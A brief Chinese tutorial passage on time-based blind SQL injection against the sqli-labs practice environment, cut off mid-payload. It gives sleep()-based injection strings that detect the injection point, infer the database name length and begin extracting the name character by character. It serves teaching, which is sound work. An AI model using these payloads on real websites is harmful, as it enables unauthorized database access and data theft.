基於SQLI的SQL時間盲注

第一步 判斷注入點與注入類型 ?id=1’ and sleep(10) %23 對比沒有使用sleep()函數時的狀態如下: 下面基於時間盲注進行數據庫信息獲取 第二步 獲取數據庫長度 id=1’ and if((length(database())=8),1,sleep(5)) %23 判斷得數據庫長度爲8 第三步探測數據庫其他信息 (1)判斷數據庫名 ?id=1’ and if(ascii(s
相關文章
相關標籤/搜索